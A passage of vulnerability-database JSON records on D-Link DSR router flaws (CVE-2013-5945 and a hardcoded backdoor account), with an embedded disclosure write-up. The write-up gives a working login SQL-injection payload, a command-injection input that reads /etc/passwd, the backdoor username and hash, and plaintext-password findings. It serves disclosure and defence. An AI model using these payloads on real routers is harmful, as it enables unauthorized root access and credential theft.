            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 9.0,
            "confidentialityImpact": "COMPLETE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2013-15014",
            "impactScore": 8.5,
            "integrityImpact": "PARTIAL",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:C/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 5.9,
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 9.8,
            "baseSeverity": "Critical",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "JVNDB-2013-007216",
            "impactScore": null,
            "integrityImpact": "High",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2013-5945",
            "trust": 1.0,
            "value": "CRITICAL"
          },
          {
            "author": "NVD",
            "id": "JVNDB-2013-007216",
            "trust": 0.8,
            "value": "Critical"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2013-15014",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-201312-319",
            "trust": 0.6,
            "value": "CRITICAL"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5945"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-319"
      }
    ]
  },
  "description": {
    "_id": null,
    "data": "Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 allow remote attackers to execute arbitrary SQL commands via the password to (1) the login.authenticate function in share/lua/5.1/teamf1lualib/login.lua or (2) captivePortal.lua. plural D-Link The product has SQL An injection vulnerability exists.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. D-Link DSR is a wireless service router product. The successful use of the SQL injection vulnerability in the D-Link DSR router family enables attackers to control applications, access or modify data, and exploit other vulnerabilities in the underlying database to bypass authentication. D-Link DSR Router Series are prone to an SQL-injection vulnerability. #\n# CVEs:                  \n#     CVE-2013-5945 - Authentication Bypass by SQL-Injection\n#     CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution\n# \n# Vulnerable Routers:    \n#     D-Link DSR-150 (Firmware \u003c v1.08B44)\n#     D-Link DSR-150N (Firmware \u003c v1.05B64)\n#     D-Link DSR-250 and DSR-250N (Firmware \u003c v1.08B44)\n#     D-Link DSR-500 and DSR-500N (Firmware \u003c v1.08B77)\n#     D-Link DSR-1000 and DSR-1000N (Firmware \u003c v1.08B77)\n#\n# Download URL:      \n#     http://tsd.dlink.com.tw\n# \n# Arch:                  \n#     mips and armv6l, Linux\n# \n# Author:                \n#     0_o -- null_null\n#     nu11.nu11 [at] yahoo.com\n#\n# Date:                  \n#     2013-08-18\n# \n# Purpose:               \n#     Get a non-persistent root shell on your D-Link DSR. \n# \n# Prerequisites:         \n#     Network access to the router ports 443 and 23. \n#     !!! NO AUTHENTICATION CREDENTIALS REQUIRED !!!\n#\n#\n# A list of identified vulns follows. This list is not exhaustive as I assume\n# more vulns are present that just slipped my attention. \n# The fact that D-Link implemented a backdoor user (for what reason, please??)\n# and just renamed it instead of completely removing it after it was targetted\n# by my previous exploit, as well as the triviality of those vulns I found \n# makes me suggest that more vulns are present that are comparably easy to\n# exploit. \n#\n# Since 2013-12-03, patches are available for:\n#   DSR-150:                Firmware v1.08B44\n#   DSR-150N:               Firmware v1.05B64\n#   DSR-250 and DSR-250N:   Firmware v1.08B44\n#   DSR-500 and DSR-500N:   Firmware v1.08B77\n#   DSR-1000 and DSR-1000N: Firmware v1.08B77\n# via http://tsd.dlink.com.tw\n#\n# And now, have a worthwhile read :-)\n#\n\n\n0. Contents:\n\n\n1. Vulnerability: Authentication Bypass by SQL-Injection \n                  (CVE-2013-5945)\n2. Vulnerability: Privilege Escalation by Arbitrary Command Execution \n                  (CVE-2013-5946)\n3. Exposure:      D-Link backdoor user\n4. Vulnerability: Use of weak hash algorithms\n5. Exposure:      Passwords are stored as plain text in config files\n6. Vulnerability: Bad permissions on /etc/shadow\n\n\n\n1. Vulnerability: Authentication Bypass by SQL-Injection\n                  (CVE-2013-5945)\n\n\n* Possible via the global webUI login form. \n\n* File /pfrm2.0/share/lua/5.1/teamf1lualib/login.lua contains:\n\n  function login.authenticate(tablename, tableInput)\n    local username = tableInput[\"Users.UserName\"]\n    local password = tableInput[\"Users.Password\"]\n    local cur = db.execute(string.format([[\n                  SELECT *, ROWID AS _ROWID_ FROM %s\n          WHERE %s = \u0027%s\u0027 AND %s = \u0027%s\u0027\n      ]], tablename, \"UserName\", username, \"Password\", password))\n    local result = false\n    local statusCode = \"NONE\"\n    if cur then\n      local row = cur:fetch({}, \"a\")\n      cur:close()\n      result = row ~= nil\n      if result == false then\n        statusCode = \"USER_LOGIN_INVALID_PASSWORD\"\n      end\n    end\n    return result, statusCode\n  end\n\n* This function creates an SQL statement of the form:\n\n  SELECT * FROM \"Users\" WHERE \"UserName\" = \u0027user\u0027 AND \"Password\" = \u0027pass\u0027;\n\n* Since there is a default admin user account called \"admin\" around, this is \n  easily exploitable by providing this to the login form:\n\n  username = admin\n  password = \u0027 or \u0027a\u0027=\u0027a\n\n* ...resulting in this SQL statement:\n\n  SELECT * \n    FROM \"Users\" \n    WHERE \"UserName\" = \u0027admin\u0027 \n      AND \"Password\" = \u0027\u0027 or \u0027a\u0027=\u0027a\u0027;\n\n* Old school SQL injection. Ohh, by the way... \n\n* The same fault can be found in captivePortal.lua \n  -- FREE NETWORKS FOR EVERYONE --\n\n\n\n2. Vulnerability: Privilege Escalation by Arbitrary Command Execution \n                  (CVE-2013-5946)\n\n\n* Possible from the Tools --\u003e System Check page. \n\n* File /pfrm2.0/var/www/systemCheck.htm contains:\n\n  local function runShellCmd(command)\n      local pipe = io.popen(command .. \" 2\u003e\u00261\") -- redirect stderr to stdout\n      local cmdOutput = pipe:read(\"*a\")\n      pipe:close()\n      return cmdOutput\n  end\n  if (ButtonType and ButtonType == \"ping\") then\n  [...]\n  local cmd_ping = pingprog .. \" \" .. ipToPing .. \" \" .. options1 .. \" \u003e \" .. pingfile\n        globalCmdOutput = runShellCmd (cmd_ping) \n        statusMessage = \"Pinging \" .. ipToPing\n  [...]\n  elseif (ButtonType and ButtonType == \"traceroute\") then\n  [...]\n    local cmd = traceRouteProg .. \" \" .. ipToTraceRoute .. options\n    globalCmdOutput = runShellCmd(cmd)\n    statusMessage = \"Traceroute To \" .. ipToTraceRoute .. \"...\"\n  [...]\n  elseif (ButtonType and ButtonType == \"dnslookup\") then\n  [...]\n    util.appendDebugOut(\"Exec = \" .. os.execute(nsLookupProg .. \" \" .. internetNameToNsLookup .. \" \u003e \" .. nsLookupFile))\n    statusMessage = \"DNS Lookup for \" .. internetNameToNsLookup\n  [...]\n\n* Command injection is possible in at least these form sections:\n  \n  Ping or Trace an IP Address\n  Perform a DNS Lookup\n  \n* When using a browser, deactivate the \"onclick\" JavaScript checks using \n  a tool like Firebug. Tools like curl are not hindered by these checks. \n  \n* All forms allow input like this:\n  \n  localhost;\u003ccommand\u003e\n  \n  example: \n  \n  localhost;cat /etc/passwd\n  \n* This user provided value is then directly used as part of the input for the\n  call to runShellCmd(c) and thus io.popen(c) in the first form section and \n  os.execute(c) in the second form section. \n  \n* Output from user provided commands gets displayed on the next page beneath \n  the benign command output. \n  \n  example: \n  \n  [...]\n  \u003ctextarea rows=\"15\" name=\"S1\" cols=\"60\" wrap=\"off\" class=\"txtbox1\"\u003e\n    traceroute to localhost (127.0.0.1), 10 hops max, 40 byte packets\n     1  localhost (127.0.0.1)  0.429 ms  0.255 ms  0.224 ms\n    root:!:0:0:root:/root:/bin/sh\n    gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh\n    nobody:x:0:0:nobody:/nonexistent:/bin/false\n    ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh\n    guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh\n    admin:x:0:2:Linux User,,,:/home/admin:/bin/sh\n  \u0026lt;/textarea\u0026gt;\n  [...]\n  \n  \n  \n3. Exposure: D-Link backdoor user:\n  \n  \n* This was the contents of my /etc/passwd after I upgraded to 1.08B39_WW:\n\n  root:!:0:0:root:/root:/bin/sh\n  gkJ9232xXyruTRmY:$1$MqlhcYXP$CC3cvqpCg0RJAzV85LSeO0:0:0:root:/:/bin/sh\n  nobody:x:0:0:nobody:/nonexistent:/bin/false\n  ZX4q9Q9JUpwTZuo7:x:0:2:Linux User,,,:/home/ZX4q9Q9JUpwTZuo7:/bin/sh\n  guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh\n  admin:x:0:2:Linux User,,,:/home/admin:/bin/sh\n\n* You can see the old D-Link backdoor user name \"ZX4q9Q9JUpwTZuo7\". \n  That was the account I hacked before with my previous exploit: \n  http://www.exploit-db.com/papers/22930/\n  And there is a new backdoor user \"gkJ9232xXyruTRmY\" introduced. \n  Instead of removing the backdoor, D-Link just created a new one. \n  \n* I verified this by showing the /etc/profile:\n  \n  # /etc/profile\n  LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib\n  PATH=.:/pfrm2.0/bin:$PATH\n  CLISH_PATH=/etc/clish\n  export PATH LD_LIBRARY_PATH CLISH_PATH\n  # redirect all users except root to CLI\n  if [ \"$USER\" != \"gkJ9232xXyruTRmY\" ] ; then\n  trap \"/bin/login\" SIGINT\n  trap \"\" SIGTSTP\n  /pfrm2.0/bin/cli\n  exit\n  fi\n  PS1=\u0027DSR-250N\u003e \u0027\n  \n  \n  \n4. Vulnerability: Use of weak hash algorithms:\n\n\n* In the /etc/shadow, salted DES hashes are used to store user passwords. \n  Since this hash type supports at most 8 characters, users can log in by just \n  typing the first 8 letters of their passwords when using SSH or telnet. \n  \n* An effective password length limitation of 8 characters makes brute force \n  attacks on user accounts very feasible, even if the user chose a longer \n  password. \n\n\n\n5. Exposure: Passwords are stored as plain text in config files:\n\n\n* A lookup into the system config file /tmp/teamf1.cfg.ascii, from which the \n  /tmp/system.db is built on boot time, reveals that all user passwords are \n  stored in plain text. \n\n  Example:\n\n  [...]  \n  Users = {}\n  Users[1] = {}\n  Users[1][\"Capabilities\"] = \"\"\n  Users[1][\"DefaultUser\"] = \"1\"\n  Users[1][\"UserId\"] = \"1\"\n  Users[1][\"FirstName\"] = \"backdoor\"\n  Users[1][\"OID\"] = \"0\"\n  Users[1][\"GroupId\"] = \"1\"\n  Users[1][\"UserName\"] = \"gkJ9232xXyruTRmY\"\n  Users[1][\"Password\"] = \"thisobviouslyisafakepass\"\n  Users[1][\"UserTimeOut\"] = \"10\"\n  Users[1][\"_ROWID_\"] = \"1\"\n  Users[1][\"LastName\"] = \"ssl\"\n  [...]\n  \n  \n  \n6. Vulnerability: Bad permissions on /etc/shadow\n\n\n* This file should have 600 permissions set and not 644. It is world readable. \n  Pointless, since every process runs as root, no user separation is \n  done anyway. \n\n  DSR-250N\u003e ls -l -a /etc/shadow\n  -rw-r--r--    1 root     root           115 Sep 27 15:07 /etc/shadow\n  DSR-250N\u003e ps\n    PID USER       VSZ STAT COMMAND\n      1 root      2700 S    init\n      2 root         0 SW\u003c  [kthreadd]\n      3 root         0 SW\u003c  [ksoftirqd/0]\n      4 root         0 SW\u003c  [events/0]\n      5 root         0 SW\u003c  [khelper]\n      8 root         0 SW\u003c  [async/mgr]\n    111 root         0 SW\u003c  [kblockd/0]\n    120 root         0 SW\u003c  [khubd]\n    123 root         0 SW\u003c  [kseriod]\n    128 root         0 SW\u003c  [kslowd]\n    129 root         0 SW\u003c  [kslowd]\n    150 root         0 SW   [pdflush]\n    151 root         0 SW   [pdflush]\n    152 root         0 SW\u003c  [kswapd0]\n    200 root         0 SW\u003c  [aio/0]\n    210 root         0 SW\u003c  [nfsiod]\n    220 root         0 SW\u003c  [crypto/0]\n    230 root         0 SW\u003c  [cns3xxx_spi.0]\n    781 root         0 SW\u003c  [mtdblockd]\n    860 root         0 SW\u003c  [usbhid_resumer]\n    874 root         0 SW\u003c  [rpciod/0]\n    903 root         0 SWN  [jffs2_gcd_mtd4]\n    909 root         0 SWN  [jffs2_gcd_mtd5]\n    918 root      3596 S    unionfs -s -o cow,nonempty,allow_other /rw_pfrm2.0=R\n    999 root      1816 S \u003c  /pfrm2.0/udev/sbin/udevd --daemon\n   1002 root      2988 S    /pfrm2.0/bin/platformd /tmp/system.db\n   1003 root      3120 S    /pfrm2.0/bin/evtDsptchd /tmp/system.db\n   1049 root      2704 S    /usr/sbin/telnetd -l /bin/login\n   1097 root      4560 S    /pfrm2.0/bin/wlanClientArlFlushd\n   1141 root     37000 S    /pfrm2.0/bin/sshd\n   1154 root      3068 S    /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN1 5\n   1255 root      3148 S    /pfrm2.0/bin/nimfd /tmp/system.db\n   1259 root      3068 S    /pfrm2.0/bin/linkStatusDetect /tmp/system.db WAN2 5\n   1375 root      3588 S    /pfrm2.0/bin/firewalld /tmp/system.db\n   1560 root         0 SW\u003c  [key_timehandler]\n   1598 root      7776 S    /pfrm2.0/bin/racoon -a 8787 -f /var/racoon_path.conf\n   1600 root      8036 S    rvgd /tmp/system.db\n   1612 root         0 SW   [cavium]\n   1621 root      8424 S    vpnKAd /tmp/system.db\n   1685 root      5372 S    /pfrm2.0/sslvpn/bin/firebase -d\n   1702 root      5016 S    /pfrm2.0/sslvpn/bin/smm -d\n   1711 root      6052 S    /pfrm2.0/sslvpn/bin/httpd\n   1712 root      2700 S    /bin/sh /var/sslvpn/var/httpdKeepAlive.sh\n   1771 root      2680 S    /pfrm2.0/bin/statusD\n   1933 root      3092 S    /pfrm2.0/bin/loggingd /tmp/system.db\n   1960 root      5284 S    /pfrm2.0/bin/radEap -d /tmp/system.db\n   1962 root      2988 S    /pfrm2.0/bin/rebootd /tmp/system.db\n   2004 root      2988 S    /pfrm2.0/bin/crond /tmp/system.db\n   2008 root      3260 S    /pfrm2.0/bin/ntpd /tmp/system.db\n   2196 root      3128 S    /pfrm2.0/bin/intelAmtd /tmp/system.db\n   2205 root      1904 S    /pfrm2.0/bin/fReset\n   2311 root      2704 S    /bin/sh /pfrm2.0/bin/release_cache.sh\n   2312 root      2704 S    /sbin/getty -L ttyS0 115200 vt100\n   2463 root      3964 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg30 -lf /va\n   2481 root      3964 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg50 -lf /va\n   3355 root      1768 S    /pfrm2.0/bin/rt2860apd\n   3443 root      4116 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg40 -lf /va\n   3451 root      4116 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg20 -lf /va\n   3457 root      3964 S    /pfrm2.0/bin/dhcpd -cf /etc/dhcpd.conf.bdg1 -lf /var\n   3484 root      7836 S    /pfrm2.0/bin/snmpd -p /var/run/snmp.pid\n   3518 root      4424 S    /pfrm2.0/bin/openvpn --config /var/openvpn/openvpn.c\n   3630 root      1928 S    /pfrm2.0/bin/dnsmasq --dns-forward-max=10000 --addn-\n   5353 root      2704 S    -sh\n   7877 root      2568 S    sleep 60\n   7953 root      2568 S    sleep 60\n   8008 root      2704 R    ps\n  16749 root      2704 S    -sh\n  25690 root         0 SW\u003c  [RtmpCmdQTask]\n  25692 root         0 SW\u003c  [RtmpWscTask]\n  DSR-250N\u003e\n\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2013-5945"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014"
      },
      {
        "db": "BID",
        "id": "64172"
      },
      {
        "db": "PACKETSTORM",
        "id": "124319"
      }
    ],
    "trust": 2.52
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2013-5945",
        "trust": 3.4
      },
      {
        "db": "EXPLOIT-DB",
        "id": "30061",
        "trust": 2.4
      },
      {
        "db": "BID",
        "id": "64172",
        "trust": 0.9
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-319",
        "trust": 0.6
      },
      {
        "db": "PACKETSTORM",
        "id": "124319",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014"
      },
      {
        "db": "BID",
        "id": "64172"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216"
      },
      {
        "db": "PACKETSTORM",
        "id": "124319"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5945"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-319"
      }
    ]
  },
  "id": "VAR-202002-0660",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014"
      }
    ],
    "trust": 1.6
  },
  "iot_taxonomy": {
    "_id": null,
    "data": [
      {
        "category": [
          "IoT",
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:08:58.525000Z",
  "patch": {
    "_id": null,
    "data": [
      {
        "title": "Top Page",
        "trust": 0.8,
        "url": "https://www.dlink.com/"
      },
      {
        "title": "Patch for SQL Injection Vulnerability for D-Link DSR Router Series",
        "trust": 0.6,
        "url": "https://www.cnvd.org.cn/patchinfo/show/41586"
      },
      {
        "title": "D-Link DSR Router Series SQL Repair measures for injecting vulnerabilities",
        "trust": 0.6,
        "url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=108894"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-319"
      }
    ]
  },
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-89",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5945"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 2.4,
        "url": "http://www.exploit-db.com/exploits/30061"
      },
      {
        "trust": 1.6,
        "url": "http://tsd.dlink.com.tw/temp/pmd/12879/dsr-500_500n_1000_1000n_a1_release_notes_fw_v1.08b77_ww.pdf"
      },
      {
        "trust": 1.6,
        "url": "http://tsd.dlink.com.tw/temp/pmd/12960/dsr-150n_a2_release_notes_fw_v1.05b64_ww.pdf"
      },
      {
        "trust": 1.6,
        "url": "http://tsd.dlink.com.tw/temp/pmd/12966/dsr-150_a1_a2_release_notes_fw_v1.08b44_ww.pdf"
      },
      {
        "trust": 1.6,
        "url": "http://tsd.dlink.com.tw/temp/pmd/13039/dsr-250_250n_a1_a2_release_notes_fw_v1.08b44_ww_ru.pdf"
      },
      {
        "trust": 1.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5945"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5945"
      },
      {
        "trust": 0.6,
        "url": "http://www.linuxidc.com/linux/2013-12/93897.htm"
      },
      {
        "trust": 0.3,
        "url": "http://tsd.dlink.com.tw/"
      },
      {
        "trust": 0.3,
        "url": "http://www.dlink.com/"
      },
      {
        "trust": 0.1,
        "url": "http://www.exploit-db.com/papers/22930/"
      },
      {
        "trust": 0.1,
        "url": "http://tsd.dlink.com.tw"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-5946"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014"
      },
      {
        "db": "BID",
        "id": "64172"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216"
      },
      {
        "db": "PACKETSTORM",
        "id": "124319"
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5945"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-319"
      }
    ]
  },
  "sources": {
    "_id": null,
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2013-15014",
        "ident": null
      },
      {
        "db": "BID",
        "id": "64172",
        "ident": null
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216",
        "ident": null
      },
      {
        "db": "PACKETSTORM",
        "id": "124319",
        "ident": null
      },
      {
        "db": "NVD",
        "id": "CVE-2013-5945",
        "ident": null
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-319",
        "ident": null
      }
    ]
  },
  "sources_release_date": {
    "_id": null,
    "data": [
      {
        "date": "2013-12-13T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-15014",
        "ident": null
      },
      {
        "date": "2013-12-03T00:00:00",
        "db": "BID",
        "id": "64172",
        "ident": null
      },
      {
        "date": "2020-02-28T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-007216",
        "ident": null
      },
      {
        "date": "2013-12-07T17:10:52",
        "db": "PACKETSTORM",
        "id": "124319",
        "ident": null
      },
      {
        "date": "2020-02-11T12:15:11.757000",
        "db": "NVD",
        "id": "CVE-2013-5945",
        "ident": null
      },
      {
        "date": "2013-12-19T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201312-319",
        "ident": null
      }
    ]
  },
  "sources_update_date": {
    "_id": null,
    "data": [
      {
        "date": "2013-12-13T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2013-15014",
        "ident": null
      },
      {
        "date": "2013-12-03T00:00:00",
        "db": "BID",
        "id": "64172",
        "ident": null
      },
      {
        "date": "2020-02-28T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2013-007216",
        "ident": null
      },
      {
        "date": "2021-04-23T18:13:42.867000",
        "db": "NVD",
        "id": "CVE-2013-5945",
        "ident": null
      },
      {
        "date": "2021-04-30T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201312-319",
        "ident": null
      }
    ]
  },
  "threat_type": {
    "_id": null,
    "data": "remote",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "124319"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-319"
      }
    ],
    "trust": 0.7
  },
  "title": {
    "_id": null,
    "data": "plural  D-Link In the product  SQL Injection vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2013-007216"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "_id": null,
    "data": "SQL injection",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201312-319"
      }
    ],
    "trust": 0.6
  }
}

VAR-201312-0289

Vulnerability from variot - Updated: 2023-12-18 12:08

D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username. plural D-Link Router product firmware is user name gkJ9232xXyruTRmY There is a vulnerability that can be obtained because it has a hard-coded account.An access right may be obtained by using the user name information by a third party. D-Link DSR is a wireless service router product developed by D-Link. D-Link DSR Router Series are prone to a security-bypass vulnerability. A trust management vulnerability exists in several D-Link products. The vulnerability stems from the fact that the program has a hard-coded user account named 'gkJ9232xXyruTRmY'. The following products and versions are affected: DSR-150 with firmware version 1.08B29 and earlier; DSR-150N with firmware version 1.05B51 and earlier; DSR-250 and DSR-250N with firmware version 1.08B39 and earlier; DSR-500, DSR-500N, DSR-1000, DSR-1000N with previous firmware versions

Show details on source website

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-201312-0289",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.05b53"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b53"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b25"
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b36"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b43"
      },
      {
        "model": "dsr-150",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.04b58"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.02b25"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b12"
      },
      {
        "model": "dsr-150n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": null
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b36"
      },
      {
        "model": "dsr-500",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b43"
      },
      {
        "model": "dsr-1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b50"
      },
      {
        "model": "dsr-250n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b46"
      },
      {
        "model": "dsr-150",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b29"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b36"
      },
      {
        "model": "dsr-250n",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.08b39"
      },
      {
        "model": "dsr-500n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.03b43"
      },
      {
        "model": "dsr-1000n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.06b53"
      },
      {
        "model": "dsr-250",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "dlink",
        "version": "1.01b46"
      },
      {
        "model": "dsr-1000",
